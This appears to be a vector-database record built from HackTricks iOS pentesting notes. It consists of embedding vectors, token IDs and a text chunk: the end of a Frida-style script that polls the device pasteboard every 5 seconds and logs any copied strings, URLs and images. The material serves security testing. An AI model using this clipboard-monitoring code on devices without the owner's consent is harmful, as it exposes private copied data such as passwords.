0.04434262216091156, -0.34229978919029236, 0.2943632900714874, 0.8532851934432983, -1.0100517272949219, 0.14989452064037323, -0.046385835856199265, -0.06749514490365982, 0.2893539071083069, 0.06073901429772377, 0.10274888575077057, 0.21218088269233704, 0.35491958260536194, 0.39418089389801025, 0.2818972170352936, -0.6490511894226074, 0.07170489430427551, -0.36981165409088135, -0.9735432863235474, -0.5406619310379028, -0.28148186206817627, 0.32424604892730713, -0.2156572788953781, -0.10826307535171509, 0.09970153868198395, 0.4205986261367798, 0.05242770165205002, -0.004557872656732798, -0.45527055859565735, 0.6193141341209412, 0.33741581439971924, 0.31892523169517517, -0.12614338099956512, 0.0020966404117643833, 0.14771482348442078, -0.07898250967264175, -0.5783752202987671, 0.16121557354927063, -0.7015762329101562, 0.41720837354660034, 0.09046308696269989, 0.19625313580036163, -0.638182520866394, -0.28891608119010925, 0.31981760263442993, 0.09976009279489517, 0.9643293023109436, -0.09567397087812424, 0.5401078462600708, -0.15962930023670197, -0.19822734594345093, 0.1335355043411255, -0.5539303421974182, -0.2701660394668579, 0.6144946813583374, 0.3530511260032654, -0.7434828877449036, 0.1750558614730835, 0.004938987549394369, -0.26884403824806213, -0.017181478440761566, 0.13725519180297852, 0.3313973844051361, -0.13725772500038147, -0.4574298858642578, 0.7498059868812561, -0.7784226536750793, -0.8022775053977966, -0.009217902086675167, 0.5253462791442871, -0.6259556412696838, -0.8231492638587952, 0.37035566568374634, 0.6249358057975769, 0.5159090757369995, -0.1497499644756317, -0.25224068760871887, 0.014025688171386719, 0.48574888706207275, 0.34266790747642517, 0.27572503685951233, 0.646477460861206, -0.3809928894042969, 0.495001882314682, -0.9270145893096924, 0.03050193004310131, 0.21180114150047302, -0.20605617761611938, 0.5490005016326904, 0.14967156946659088, -0.4775225520133972, 0.3594261407852173, 0.14385707676410675, -0.26957520842552185, 1.0955612659454346, 0.8929604887962341, 0.3710423409938812, -0.311078280210495, -0.08286159485578537, -0.7652661204338074, 0.24522048234939575, 0.8785029053688049, 0.3132772147655487, -0.12378644198179245, 0.06821469962596893, 0.4530025124549866, -0.645678699016571, 0.6809097528457642, 0.25866377353668213, -0.055281393229961395, 0.4387293756008148, -0.3816456198692322, 0.09094556421041489, 0.03518855571746826, 0.21439120173454285, -0.6785873174667358, 0.2827279567718506, -0.36582034826278687, -0.6628201603889465, 0.16107520461082458, -0.3019125759601593, 0.5845456123352051, -0.8897213935852051, 1.0380228757858276, 0.022725604474544525, 0.34176379442214966, -0.38205134868621826, -0.043163105845451355, -1.24321711063385, 0.3605525493621826, 1.3738936185836792, -0.03349975869059563, 0.037521637976169586, 0.49443379044532776, -0.11392499506473541, 0.4923524260520935, 0.1724524050951004, -0.4008401036262512, -0.4916042685508728, 0.9553413987159729, -0.46353328227996826, -0.7550601959228516, -0.4175814092159271, -0.5372475385665894, 0.15113712847232819, 0.02746579237282276, 0.8238693475723267, -0.17923274636268616, -0.7156534790992737, -0.609623908996582, 0.2796039283275604, -0.0890476182103157, 0.10457874834537506, 0.3429289162158966, -0.5044146776199341, -0.5543919801712036, 0.6776782274246216, 0.3916086256504059, 0.3745943009853363, 0.28536632657051086, 0.7976291179656982, 0.43320924043655396, 0.480385959148407, 0.06816058605909348, -0.15558424592018127, -0.36227667331695557, 0.240716353058815, -0.165466770529747, -0.5682317018508911, 0.04506940022110939, -0.00669694971293211, 0.4161812365055084, -0.23969531059265137, 0.0977468490600586, -0.948330283164978, 0.13592511415481567, -0.219003364443779, -0.7879442572593689, 0.3033443093299866, -0.006315629929304123, -0.3346264958381653, 0.3429027497768402, 0.17469877004623413, -0.15240967273712158, -0.4121936857700348, -0.6282613277435303, -0.9041610360145569, -0.38673585653305054, 0.14821331202983856, -0.19708459079265594, 0.6219694018363953, -0.09792342036962509, 0.1877496838569641, 0.28855034708976746, -0.42872539162635803, -0.4322919547557831, 0.40792953968048096, -0.26224690675735474, -0.22063711285591125, 0.2799408435821533, 0.16823087632656097, 0.24232260882854462, 0.4663951098918915, -0.00045087948092259467, 0.13848377764225006, 0.5509724617004395, 1.1724830865859985, -0.3786207437515259, 1.319757103919983, 0.18862155079841614, -0.17338979244232178, 0.5038878321647644, -0.27168115973472595, 0.7838160991668701, 0.04930507019162178, -0.2800970673561096, -0.10226472467184067, -0.3293125629425049, -0.9449376463890076, -0.36150240898132324, -0.24423256516456604, 0.23607073724269867, 0.07395980507135391, -0.26772499084472656, -0.9525821208953857, -0.05706958472728729, -0.7196358442306519, 0.15194347500801086, 0.43306517601013184, 0.4062720239162445, 0.12860651314258575, 0.293246328830719, 0.12193278968334198, -1.2439935207366943, 4.4224066734313965, 0.7728405594825745, -0.13918882608413696, 0.13109704852104187, 0.24317941069602966, 0.6685008406639099, 1.5117099285125732, -0.5179678797721863, 0.5009002089500427, 0.05184611678123474, 0.25178173184394836, 0.11554944515228271, 0.23073476552963257, 0.6007457375526428, 0.6366673111915588, 0.2887384295463562, -0.45803964138031006, 0.4989004135131836, -0.19583818316459656, -1.12703537940979, -0.9415023326873779, 0.2924124598503113, -0.8186531662940979, 0.9027894139289856, 0.26763948798179626, 0.29392510652542114, 0.4060235917568207, -0.445060133934021, -0.23902839422225952, -0.18021486699581146, 0.5202427506446838, -0.2998393774032593, -0.012047628872096539, -0.04475254938006401, -0.20805908739566803, 0.1938391625881195, -0.23395252227783203, -0.6600213050842285, -0.9210759401321411, -0.5154236555099487, 0.48419883847236633, -0.28510600328445435, 0.06609822809696198, 0.14347299933433533, 0.33414432406425476, 0.87296462059021, -0.613630473613739, 0.5226233601570129, 0.5724198222160339, -0.3267490267753601, 0.7360048294067383, 0.4179643392562866, 0.7141262888908386, -0.25959450006484985, -0.6128059029579163, 0.19488726556301117, -0.25270843505859375, 0.061841968446969986, 0.0478314533829689, -0.08192820101976395, 0.8762066960334778, -0.47750306129455566, -0.24632084369659424, -0.03923438489437103, -1.2152310609817505, 0.6849676370620728, -0.35339024662971497, 1.1843047142028809, 0.3383951783180237, -0.06558031588792801, -0.062451425939798355, -0.16022513806819916, -0.6999254822731018, 0.18198220431804657, 0.5647399425506592, -0.49720096588134766, -0.12048405408859253, -0.09796833246946335, 0.8839554190635681, -0.7862769365310669, -0.12426973134279251, -1.2108967304229736, -0.9946267604827881, 0.20743617415428162, 1.1781877279281616, 0.9797173142433167, 0.06434112787246704, -0.8046048283576965, 0.10914124548435211, 0.5963385105133057, -0.20693089067935944, 0.16877400875091553, -0.7891111969947815, -0.22664089500904083, -0.15806391835212708 ]
[ 3973, 5140, 1024, 6855, 19351, 6277, 2171, 2011, 8103, 2075, 19351, 6277, 24415, 18442, 1024, 3443, 1024, 1998, 29508, 2049, 7953, 11709, 2030, 19351, 6277, 24415, 19496, 4226, 18442, 1998, 29508, 2049, 2709, 3643, 1012, 2131, 1996, 2034, 2800, 19351, 6277, 8875, 1024, 1041, 1012, 1043, 1012, 2005, 7817, 2224, 5164, 4118, 1012, 2030, 2224, 2151, 1997, 1996, 2060, 4725, 2005, 1996, 3115, 2951, 4127, 1012, 2131, 1996, 2193, 1997, 5167, 2007, 2193, 11253, 4221, 5244, 1012, 4638, 2005, 4598, 1997, 3115, 2951, 4127, 2007, 1996, 15106, 4725, 1010, 1041, 1012, 1043, 1012, 2038, 9581, 8449, 1010, 2038, 3367, 4892, 2015, 1010, 2038, 3126, 4877, 1006, 3225, 1999, 16380, 2184, 1007, 1012, 4638, 2005, 2060, 2951, 4127, 1006, 4050, 21183, 2483, 1007, 2007, 3397, 19707, 2618, 6277, 13874, 2015, 1024, 1999, 4221, 5244, 3388, 1024, 1012, 2017, 2089, 22459, 2005, 2062, 5509, 2951, 4127, 2066, 1010, 2005, 2742, 2019, 3861, 2004, 2270, 1012, 1052, 3070, 1998, 2270, 1012, 14841, 4246, 1006, 21183, 2483, 1007, 2030, 2005, 7661, 2951, 2107, 2004, 4012, 1012, 2026, 9006, 9739, 2100, 1012, 2026, 29098, 1012, 2026, 13874, 1012, 3342, 2008, 1010, 1999, 2023, 2553, 1010, 2069, 2216, 18726, 2008, 13520, 3716, 1997, 1996, 2828, 2024, 2583, 2000, 3305, 1996, 2951, 2517, 2000, 1996, 19351, 6277, 1012, 12850, 2068, 2478, 5167, 3388, 24415, 19707, 2618, 6277, 13874, 2015, 1024, 1998, 4292, 1996, 7978, 21183, 2483, 1012, 4638, 2005, 12421, 2030, 4654, 8197, 4892, 5167, 2011, 8103, 2075, 2275, 4221, 5244, 1024, 7047, 1024, 1998, 29508, 2049, 7047, 2005, 21318, 19707, 2618, 6277, 7361, 3508, 4135, 9289, 2239, 2135, 2030, 21318, 19707, 2618, 6277, 7361, 3508, 10288, 16781, 13701, 1012, 2065, 2069, 2559, 2005, 7817, 2017, 2089, 2215, 2000, 2224, 22224, 1005, 1055, 3094, 16380, 19351, 6277, 8080, 1024, 18008, 2046, 1996, 16380, 21318, 19707, 2618, 6277, 2465, 1998, 14592, 1996, 2236, 19707, 2618, 6277, 2296, 1019, 3823, 2005, 2951, 1012, 2065, 2047, 2951, 2003, 2179, 1010, 2367, 2013, 1996, 3025, 8554, 1010, 2008, 2951, 2097, 2022, 14019, 2000, 3898, 1012, 2017, 2089, 2036, 3857, 2115, 2219, 19351, 6277, 8080, 2008, 15410, 3563, 2592, 2004, 2464, 2682, 1012, 2005, 2742, 1010, 2023, 5896, 1006, 4427, 2013, 1996, 5896, 2369, 22224, 1005, 1055, 19351, 6277, 8080, 1007, 9631, 1996, 19351, 6277, 5167, 2296, 1019, 3823, 1010, 2065, 2045, 1005, 1055, 2242, 2047, 2009, 2097, 6140, 2009, 1024, 9530, 3367, 21318, 19707, 2618, 6277, 1027, 27885, 3501, 2278, 1012, 4280, 1012, 21318, 19707, 2618, 6277, 1025, 9530, 3367, 19351, 6277, 1027, 21318, 19707, 2618, 6277, 1012, 2236, 19707, 2618, 6277, 1006, 1007, 1025, 13075, 5167, 1027, 1000, 1000, 1025, 13075, 4175, 1027, 19351, 6277, 1012, 2689, 3597, 16671, 1006, 1007, 1012, 2000, 3367, 4892, 1006, 1007, 1025, 2275, 18447, 2121, 10175, 1006, 3853, 1006, 1007, 1063, 9530, 3367, 2783, 3597, 16671, 1027, 19351, 6277, 1012, 2689, 3597, 16671, 1006, 1007, 1012, 2000, 3367, 4892, 1006, 1007, 1025, 9530, 3367, 2783, 4221, 5244, 1027, 19351, 6277, 1012, 5167, 1006, 1007, 1012, 2000, 3367, 4892, 1006, 1007, 1025, 2065, 1006, 2783, 3597, 16671, 1027, 1027, 1027, 4175, 1007, 1063, 2709, 1025, 1065, 5167 ]
hack_tricks
433.txt
1
= currentitems ; count = currentcount ; console. log ('[ * pasteboard changed ] count :'+ count +'hasstrings :'+ pasteboard. hasstrings ( ). tostring ( ) +'hasurls :'+ pasteboard. hasurls ( ). tostring ( ) +'hasimages :'+ pasteboard. hasimages ( ). tostring ( ) ) ; console. log ( items ) ; }, 1000 * 5 ) ; [SEP]
[ -0.31515541672706604, -0.560214102268219, -0.39243194460868835, 0.5082390308380127, -0.26936954259872437, -0.7609999775886536, -0.31197622418403625, 0.2888794243335724, 1.1038339138031006, 0.8434220552444458, 0.5182021856307983, 0.0826771929860115, -0.13878700137138367, -0.1542356014251709, -0.4608209431171417, -0.21074144542217255, -0.2157202810049057, 0.2680186629295349, -0.8385391235351562, 0.3828175663948059, 0.19914330542087555, 0.4254877269268036, -1.3485804796218872, -0.6166026592254639, -0.5878711342811584, 1.1336115598678589, -0.1251772791147232, -0.20816215872764587, 0.8924756050109863, 0.7739334106445312, -0.39319831132888794, -0.16401638090610504, 0.12250516563653946, -0.3673655092716217, -0.4456115663051605, 0.054083820432424545, 0.025435887277126312, -0.06011456251144409, -0.30283474922180176, -1.486555814743042, 0.06611979752779007, -0.7686183452606201, 0.3403877317905426, -1.1751606464385986, -1.2479885816574097, -0.14711114764213562, 0.303370863199234, -0.06725054234266281, -0.015732668340206146, -0.0983927920460701, -0.1396200805902481, -0.18791048228740692, 0.5181786417961121, -0.47042012214660645, 0.4999629259109497, -0.29167118668556213, -0.35766634345054626, -0.3004935085773468, -0.6701263785362244, 0.052078843116760254, 0.5876564383506775, 0.14749275147914886, -0.18146109580993652, -0.734434962272644, 0.0893574133515358, 0.367023766040802, 0.14867417514324188, -0.8683003187179565, 0.029407843947410583, -0.5280846357345581, -0.7066922187805176, -0.08715640008449554, -0.4308679699897766, -0.26515695452690125, -0.7711690068244934, 0.09751453250646591, -0.10791568458080292, -0.0545584112405777, -0.5942234396934509, 0.8324958682060242, -0.2797914147377014, 0.5966131091117859, 0.010068938136100769, 0.1965579092502594, -0.9225584268569946, -0.1511339694261551, -0.3055032193660736, -0.2986791729927063, 0.09446623921394348, -0.33171480894088745, -0.33392977714538574, 0.3930571377277374, -0.2085496485233307, 0.16903406381607056, 0.5819130539894104, 0.9831552505493164, 0.13634663820266724, 0.3965514898300171, 0.12287202477455139, 0.20142462849617004, 1.101264238357544, 0.6363810896873474, -0.7021734118461609, 0.44463256001472473, -0.7760220170021057, 0.016525326296687126, 0.6778767704963684, 0.6067253351211548, -0.6694245338439941, -1.1383622884750366, -0.12796317040920258, -0.09483044594526291, 0.5577418208122253, 0.4150088429450989, 0.5203633308410645, 1.0706770420074463, 0.12760959565639496, -0.06017915904521942, -0.6892953515052795, -0.15000610053539276, 0.981756329536438, 0.09505285322666168, -0.20081967115402222, -0.5366190075874329, -0.5365642309188843, 0.2339767962694168, 0.15074743330478668, 1.0903996229171753, -0.14588481187820435, -0.43138232827186584, -0.915516197681427, -0.15561994910240173, 0.05763811618089676, 0.0326710045337677, -0.09082739800214767, 0.4731687605381012, -0.1856011152267456, 0.46614888310432434, 0.17223674058914185, -0.9938890337944031, 0.41724905371665955, -0.34389469027519226, -0.311473548412323, 1.2601701021194458, 0.4979865252971649, 1.0207948684692383, -0.04244434833526611, 0.2914523184299469, -0.7457512617111206, -0.5251827836036682, -0.29632705450057983, 0.6568284630775452, -0.05550147965550423, 0.04474090039730072, -0.2167052924633026, -0.48438775539398193, -0.37861233949661255, 0.3895748555660248, -0.6081476211547852, 0.011608650907874107, 0.1702045202255249, 0.7897100448608398, 0.0692477598786354, 0.3296041786670685, -0.45737168192863464, 1.091728925704956, -0.5683478713035583, -0.6748567819595337, 0.03824726492166519, -0.3340069353580475, 0.5527562499046326, 0.19309966266155243, -0.134214848279953, 0.23640941083431244, 1.1391592025756836, 0.5963013172149658, 0.08871092647314072, -0.27241066098213196, 0.23229241371154785, 0.1267964392900467, -0.1920321136713028, 0.27106037735939026, 0.24747291207313538, -0.1380310207605362, 0.07380154728889465, 0.37114641070365906, -0.06546857953071594, -0.6290624737739563, -0.49797239899635315, -0.45406150817871094, 1.1676193475723267, 0.887869119644165, -0.7325327396392822, -0.1520177572965622, -0.0692543238401413, 0.17385829985141754, -0.6973397135734558, 0.4814949631690979, 0.12761010229587555, -1.4063913822174072, -0.22667966783046722, 0.017948558554053307, -0.326434463262558, -0.007246275432407856, -0.1454448103904724, -0.11810024827718735, 0.5297935009002686, 0.7455764412879944, -0.7089727520942688, 0.01661040633916855, 0.033601947128772736, -0.4068244993686676, -0.6926319599151611, 0.2454988658428192, 0.33478686213493347, 0.25610804557800293, -0.6318728923797607, 0.17665141820907593, 0.14978624880313873, 0.2817080020904541, 0.26368093490600586, 0.7247377634048462, 0.5594051480293274, 0.3077046275138855, 0.11004858464002609, -0.07195990532636642, 1.0029151439666748, 0.3380487561225891, -0.2955375909805298, 0.7828792929649353, -0.3828960955142975, 0.7921825051307678, -0.017650268971920013, 0.4801819622516632, 0.18235528469085693, 1.0126994848251343, 0.3319984972476959, -0.13190162181854248, 0.36539626121520996, -0.09652610123157501, -0.44790950417518616, 0.5363548994064331, 0.26945051550865173, 0.167509064078331, -0.044732704758644104, -0.2711101770401001, 0.16092650592327118, 0.7290541529655457, 0.3806072771549225, 0.9513325095176697, -0.019162960350513458, 1.0991132259368896, 0.26159238815307617, 0.46317654848098755, -0.2070492058992386, -0.5666422843933105, 0.41220030188560486, 0.8161437511444092, -0.8408795595169067, -0.5818895101547241, 0.008088488131761551, 0.5611485242843628, 0.19767209887504578, -0.5405638813972473, 0.6380671262741089, 0.2495153695344925, 0.4424087703227997, -0.01266260351985693, -0.8688843846321106, -0.5770169496536255, -0.6648318767547607, -0.5273002982139587, -0.8096398115158081, -0.39858922362327576, -0.8719213604927063, 0.3037750720977783, 0.7303622364997864, -0.6124306917190552, -0.07455478608608246, 0.20055125653743744, 0.0456465519964695, -0.2548576593399048, -0.3797694146633148, 0.9043933749198914, -0.21217575669288635, 0.09230758249759674, -0.24433985352516174, 0.4895269274711609, -0.20687085390090942, 0.0869021788239479, -0.9806297421455383, -0.26602962613105774, -0.29508140683174133, -0.5107895731925964, -0.3671001195907593, 0.3574700951576233, 0.4439360797405243, -0.3450140953063965, 0.09348128736019135, -1.0029276609420776, -0.7932689785957336, -0.5189093351364136, -0.15607231855392456, -0.14646074175834656, -0.31180471181869507, 1.1590461730957031, 0.06274878978729248, -0.01068953424692154, 0.9224191904067993, 0.6254936456680298, -0.34824272990226746, 0.5153929591178894, 0.4579313397407532, 0.5216526985168457, -0.6202870607376099, 0.6086124181747437, 0.12678620219230652, 0.8142542839050293, -0.8553460836410522, 0.21937264502048492, -0.49248820543289185, -0.09225958585739136, -0.7448564767837524, -0.43047916889190674, -0.2316729724407196, 0.5002835988998413, 0.3930719792842865, -1.294351577758789, 1.0323067903518677, -0.6464306116104126, -0.3765019178390503, -0.5196213722229004, -0.3050282299518585, -0.015235159546136856, 0.4548581838607788, -0.5825755596160889, -0.06468134373426437, 0.159966379404068, -0.1698896884918213, 0.40676289796829224, 0.8462971448898315, -0.437783420085907, -0.0047768219374120235, 0.6339060664176941, -0.4153796434402466, -0.5463089346885681, 0.09454716742038727, -0.7588567733764648, -0.18034818768501282, -0.23188796639442444, 0.16274957358837128, 0.41623857617378235, 0.7063753008842468, 0.5535095930099487, 0.24690692126750946, 0.28346389532089233, -0.7533661127090454, 0.8197575211524963, 0.5243655443191528, 0.4513140618801117, 0.679427444934845, 0.5389604568481445, -0.10219019651412964, 0.14105325937271118, -0.5447795391082764, -0.8320094347000122, 0.6343931555747986, 0.2003946602344513, 1.1143180131912231, -1.1812905073165894, 0.45077309012413025, -0.4424637258052826, 0.36358964443206787, 0.06889057159423828, 0.07988373935222626, -0.7349408864974976, 0.8824145197868347, 0.01131962426006794, 0.9203999638557434, -0.3308523893356323, -0.18425428867340088, 0.13372494280338287, -0.7349559664726257, 0.6129380464553833, 0.11880365759134293, 0.24597206711769104, -0.06763643771409988, -0.19739824533462524, -0.11071787774562836, -0.7238495349884033, -0.17085589468479156, -0.5305929183959961, -0.5868074893951416, -1.12926185131073, -0.573982298374176, -0.5821973085403442, -0.1579693853855133, 0.2228657305240631, 0.7877320051193237, -0.2284695953130722, -0.25903838872909546, -0.46287059783935547, -0.013187992386519909, 0.6577978134155273, -0.25660550594329834, 0.11907890439033508, -0.49007052183151245, 0.7995890974998474, 0.11363976448774338, 0.3111262619495392, -0.9247952103614807, -0.0974971204996109, -0.8406582474708557, -0.93326735496521, 0.63932204246521, -0.011913265101611614, -1.24915611743927, -0.20283707976341248, 0.241694375872612, 0.5669603943824768, 0.07108261436223984, -0.36739787459373474, -0.00018721830565482378, 0.1454237848520279, 0.6500622630119324, -0.9885954260826111, 0.1003008559346199, -0.25084516406059265, 0.6190871000289917, 1.1787304878234863, -0.7618650197982788, -0.5516132712364197, -0.8730689883232117, -0.5494269728660583, -1.3255032300949097, 0.08166144788265228, 1.0560821294784546, -0.4961315989494324, -0.05777856707572937, -1.1240887641906738, 0.2894990146160126, -0.028391223400831223, -0.2064923644065857, 0.11006633192300797, -0.20234142243862152, 0.2923955023288727, 0.27527081966400146, 0.5368402004241943, -0.4812849760055542, -0.10778717696666718, 0.3765999674797058, -0.9962192177772522, 0.7339974045753479, -0.7577704191207886, 0.8956013917922974, -0.2025039792060852, 0.48800739645957947, -0.22129464149475098, 0.8996127247810364, 0.1123507022857666, -0.3041042387485504, 0.10872535407543182, 0.09317982941865921, -0.026507247239351273, -0.11832254379987717, 0.9517393708229065, 0.04212985187768936, -0.07756683230400085, 0.9093936085700989, 0.13244329392910004, -0.5723755955696106, 0.6862167716026306, 0.28026074171066284, -1.028508186340332, -0.2634093165397644, 0.09813345223665237, 0.4403958320617676, -0.03991474583745003, 0.1601194590330124, 0.3095322251319885, -0.3259618878364563, 0.8661022782325745, 0.26130589842796326, -0.34386640787124634, -0.28081390261650085, -0.17496199905872345, 0.005178024061024189, -0.15476053953170776, -0.31679973006248474, 0.2535542845726013, -0.002160353120416403, -0.32124119997024536, 0.6207109689712524, -0.34553176164627075, -0.19428373873233795, 0.24955879151821136, -0.9596042633056641, -0.1933002769947052, 0.6039369106292725, 0.058637239038944244, 0.22867004573345184, -0.294141948223114, -0.973914623260498, 0.3254508376121521, -0.4582311511039734, 0.44621676206588745, -0.1461687833070755, -0.10461932420730591, 0.1929977387189865, 0.5404012203216553, -0.17472507059574127, 0.007444755174219608, -0.020984459668397903, -0.12542682886123657, 0.5594062209129333, 0.22957436740398407, 0.37898868322372437, -0.43117910623550415, 0.25794512033462524, 1.1077569723129272, -0.15024805068969727, -0.9155745506286621, 0.28884178400039673, 0.7849263548851013, 0.09429971873760223, 0.9882398843765259, 0.6677803993225098, -1.2095555067062378, -0.664182722568512, -0.80818772315979, 0.3426182270050049, -0.1481838822364807, -0.8505798578262329, -0.6710016131401062, -0.6537215113639832, 0.24053043127059937, 0.7327283024787903, -0.6448752880096436, -0.993138313293457, 0.5576717257499695, -0.5441981554031372, 0.9761825799942017, -0.6511859893798828, -0.50680011510849, 0.335105299949646, -0.48608389496803284, 0.40143901109695435, 0.27932095527648926, 0.08244533836841583, 0.8100380897521973, 0.12959447503089905, 0.06370113790035248, 0.21911479532718658, -0.04544375464320183, -0.6426841020584106, -0.5315442085266113, -0.21228083968162537, -0.06449583172798157, -0.43974053859710693, 0.14402227103710175, -0.7897364497184753, 0.09954586625099182, -0.3245607614517212, -0.05176568776369095, -0.11170700192451477, -0.11309371888637543, -0.8098640441894531, -0.7708573341369629, 0.4451587200164795, -0.6130856871604919, -0.06209107115864754, -0.4320075809955597, 0.6038879752159119, -0.020263344049453735, 0.19768497347831726, -0.030619749799370766, -0.871362566947937, -1.132321834564209, -0.3985472619533539, 0.241986945271492, -0.36418524384498596, 0.3346485197544098, -0.27599430084228516, 0.18392254412174225, 1.3306026458740234, -0.6438984274864197, 0.6941893696784973, 1.4506072998046875, 0.34197795391082764, 0.9552129507064819, -0.6763947606086731, -0.019574610516428947, 0.32175686955451965, -0.44986847043037415, -0.35837531089782715, 0.03794214874505997, -0.8683678507804871, -0.14993008971214294, -0.42547208070755005, -1.0242421627044678, -0.7852081060409546, -0.13720448315143585, 0.8734228014945984, -0.5953036546707153, 0.25742509961128235, 0.08766722679138184, -1.375823974609375, -0.6271475553512573, 0.5468724966049194, 0.2899633049964905, 0.8677116632461548, 0.4317533075809479, -0.08181875199079514, 0.3369256854057312, 0.382474809885025, 0.08190544694662094, -0.49841541051864624, -0.10954739898443222, 0.8468927145004272, -0.3035513162612915, -0.8264399766921997, 0.5504436492919922, 0.37422117590904236, -0.11950425803661346, -0.7765027284622192, -0.2503577470779419, -0.3384174108505249, -0.6067883372306824, -0.5497581958770752, -0.4214741289615631, 0.0892997533082962, -0.5547460913658142, 0.570565402507782, -0.003240669146180153, -0.13006696105003357, 0.0448458231985569, 0.06203806400299072, -0.03536888584494591, -0.06397362798452377, 0.15941651165485382, 1.2323739528656006, -0.31690624356269836, 0.212029829621315, -0.9624562859535217, -0.8967054486274719, -0.041964493691921234, 0.2730395197868347, 0.7628697156906128, -0.233101949095726, 0.4403941333293915, 0.428871214389801, -0.029101086780428886, 0.823082685470581, 0.5184718370437622, 0.1946340948343277, 0.9855585098266602, -0.5678227543830872, -0.5329911708831787, 0.08330672234296799, -0.09583673626184464, 0.4142564535140991, 0.240932434797287, 0.2452734112739563, 0.038637734949588776, 0.46564552187919617, 0.5859434008598328, -0.44304347038269043, -0.4779764711856842, -0.37659525871276855, -1.0310156345367432, 0.10009832680225372, -0.08012726157903671, -0.08938367664813995, -0.4425923228263855, -0.16134510934352875, 0.18742893636226654, -0.7848115563392639, -0.3828596770763397, 1.1171317100524902, -0.20499368011951447, 0.10421089828014374, 0.0036740887444466352, -0.056812968105077744, -0.5137934684753418, -0.5158101916313171, -0.8649511933326721, 0.02131050080060959, -0.17633284628391266, -0.4411510229110718, -1.2125098705291748, -0.32859110832214355, -0.6111831068992615, 0.7482010126113892, -0.14867162704467773, 0.04388178884983063, -0.509797990322113, -1.0742477178573608, 0.3782612979412079, -0.16808131337165833, 0.19155743718147278, 0.4582422375679016, 0.43924054503440857, -0.6573495864868164, 0.08931472897529602, -0.07616570591926575, -0.3799815773963928, -0.17548462748527527, 0.7177918553352356, 0.4950884282588959, -0.04183008894324303, 0.022037744522094727, -0.27578598260879517, -0.30655965209007263, -0.3748292624950409, -0.26558127999305725, -0.4018664062023163, 0.23830291628837585, -0.17050936818122864, -0.03166322782635689, 0.7420235276222229, 0.606812596321106, -0.049810852855443954, 0.713618278503418, -0.36114004254341125, -0.10140828788280487, -0.0006846541655249894, -0.5563938021659851, 0.6045218110084534, -0.04287320375442505, 0.10350438952445984, 0.022233406081795692, 0.009299134835600853, 0.44787099957466125, -0.40308237075805664, -0.017442060634493828, -1.1049848794937134, -0.13017845153808594, 0.16141065955162048, 0.4421100914478302, -0.07990758866071701, 0.8471095561981201, 0.1962030529975891, -0.00592177826911211, -0.02547282911837101, -0.09234537184238434, 0.6360898017883301, 0.6923561096191406, -1.5945613384246826, -0.6673493385314941, 0.08854622393846512, 0.10294327139854431, -0.20532049238681793, -0.6067582368850708, -0.3777293562889099, -0.48746684193611145, 0.3624308705329895, -0.19078166782855988, -0.3540652394294739, 0.3851865231990814, -0.14904038608074188, 0.9346583485603333, -0.9316853284835815, 0.032257866114377975, 0.9905966520309448, 0.36026811599731445, -0.4639938771724701, -1.0255827903747559, 0.1637890636920929, -0.010592949576675892, 0.7439622282981873, -0.4493228495121002, -0.4303228259086609, -0.10563495755195618, 0.041804734617471695, 0.3532325029373169, 0.40501946210861206, 0.6937086582183838, -0.6648772954940796, 0.1766485869884491, -0.6471267342567444, 0.27117615938186646, -0.6304839253425598, 0.5870187282562256, 0.26891469955444336, -0.1763342022895813, 0.12218410521745682, 0.6565555930137634, 0.8278499245643616, -0.6495670676231384, 0.8180842399597168, 0.9973597526550293, 0.5569891929626465, -0.282944917678833, -0.4233868718147278, -0.13991138339042664, 0.7846323847770691, 1.055667519569397, 0.3631276786327362, 0.2746345102787018, 0.1696826070547104, 0.805138111114502, -0.16231873631477356, 0.8894410729408264, 0.33160626888275146, -0.5747433304786682, 0.1988900750875473, -0.3332499563694, 0.014180670492351055, -0.18489298224449158, 0.04846413806080818, -0.15422385931015015, 0.066842220723629, -0.6111723780632019, -0.4178476929664612, -0.06882376223802567, -0.8558728694915771, 0.9311573505401611, -0.9513427019119263, -0.13745571672916412, 0.043196093291044235, -0.6214434504508972, 0.30333757400512695, 0.4686422348022461, -0.6961489319801331, 0.19726984202861786, 1.062481164932251, 0.30479276180267334, 0.3445781469345093, 0.14465251564979553, 0.5851439833641052, 0.9885785579681396, -0.37434691190719604, -0.6249933242797852, 0.05708856135606766, 0.030728457495570183, -0.2604111433029175, -0.7071678042411804, -0.1655081957578659, -0.2380228340625763, -0.054505784064531326, 0.4669322073459625, 0.8396729230880737, -0.5987437963485718, -0.36605989933013916, -0.5902557969093323, 0.20302847027778625, -0.05247781053185463, -0.01290739607065916, 0.28055626153945923, 0.5043838024139404, -0.5856079459190369, 0.7314857840538025, 0.07447589933872223, -0.0209517702460289, -0.5866921544075012, 0.9345636367797852, 0.19174233078956604, 1.1842743158340454, 0.74880051612854, -0.25432276725769043, -0.37047451734542847, 0.38006332516670227, -0.1903287023305893, -0.21483562886714935, -0.5716403722763062, -0.07322127372026443, -0.1345697045326233, 0.09789185225963593, -0.8616125583648682, -0.015294944867491722, 1.0344140529632568, -0.14489184319972992, -1.0946136713027954, -0.20521070063114166, 0.5380794405937195, -0.9502652883529663, -0.2781856954097748, 1.1989142894744873, -0.6936183571815491, -0.2018132507801056, -0.7978368401527405, -0.4466075897216797, 0.22993120551109314, 0.23291519284248352, -0.12893268465995789, 0.07505880296230316, -0.4399058222770691, -0.19316178560256958, -0.6164068579673767, -0.6649319529533386, -0.4172118008136749, 0.29447585344314575, 0.1958072930574417, -0.7185222506523132, 0.7591307163238525, 0.2621319591999054, 0.5969074368476868, 0.30453068017959595, -0.4724538028240204, -0.20832879841327667, 0.9178016185760498, 0.8996036052703857, 0.26995813846588135, 1.0763201713562012, 0.5754225850105286, 0.21098516881465912, 0.5478787422180176, 0.2886940836906433, 0.5850944519042969, 0.5444318652153015, -0.1633535474538803, 0.24206998944282532, 0.11559128016233444, -0.6585109233856201, -0.3589526116847992, -0.01979314535856247, 1.4552643299102783, -0.22485992312431335, -0.12229236960411072, -0.745656430721283, -0.3573560416698456, -1.2836893796920776, -0.17377912998199463, -0.31711435317993164, 0.972132682800293, -0.3000609278678894, 0.21814793348312378, 0.49428844451904297, -0.9261549115180969, 3.9735100269317627, 0.3168472945690155, 0.8315653800964355, 0.19986578822135925, 0.2198173999786377, 1.2519452571868896, 0.5599220991134644, -0.47125759720802307, -0.19470877945423126, -0.3737262785434723, 0.27585548162460327, -0.16199642419815063, 0.21261964738368988, 0.8681840896606445, 0.8423838019371033, -0.17092838883399963, -0.17417387664318085, -0.3972109854221344, 0.43706464767456055, -1.2900832891464233, -0.6676557064056396, 0.21593259274959564, 0.38126906752586365, 0.7844747304916382, 